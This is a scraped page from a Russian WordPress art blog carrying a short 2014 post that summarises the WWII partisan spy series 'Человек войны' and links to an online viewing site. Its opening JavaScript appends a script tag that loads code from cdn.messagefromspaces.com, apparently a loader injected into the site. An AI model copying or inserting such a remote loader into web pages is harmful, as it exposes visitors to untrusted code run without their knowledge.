, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Сериал Человек войны

Автор: Дмитрий Алмазов | 23 Апр 2014

События картины разворачиваются во время Великой отечественной войны, в период сражения отважных жителей Белоруссии с фашистами. Основную роль сопротивленцев играют тут бесстрашные партизанские отряды. К одному из таких подразделений как раз и относится разведывательный отряд майора Семина. Последний всеми силами пытается завербовать немецкого разведчика Курта Шиммеля, занимающего высокую должность и знающего много полезной для партизан информации. По сообщению немца, в распоряжение его частей поступило мощнейшее химическое оружие. Верить на слово двойному агенту никто не хочет, и поэтому командование отправляет в Белоруссию опытную разведчицу Лиду Эйзеншмитте, уже не раз сталкивавшуюся со сложными заданиями. Однако в лице К.Шиммеля Лида встречает очень серьезного и коварного противника. Удивительно, но оба героя даже чем-то похожи в своем профессионализме. Курт и Лида – это настоящие авантюристы, которые не прочь рискнуть даже в самой опасной ситуации. Конечно, тут сказывается и отпечаток войны, не оставившей в этих людях хотя бы доли жалости и человечности, ведь они оба преданы своей работе.

В фильме развивается ожесточенная и захватывающая борьба умов, беспощадная схватка за справедливость. Кто же победит здесь, можно будет узнать, посмотрев онлайн-сериал на http://www.ivi.ru/watch/chelovek_voiny под названием «Человек войны».

Фильм снят по мотивам романа-хроники «Лабиринты тайной войны», автором которого является бывший советский разведчик и герой РФ Юрий Колесников – в годы ВОВ он был командиром партизанского полка.

Темы: Без рубрики | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress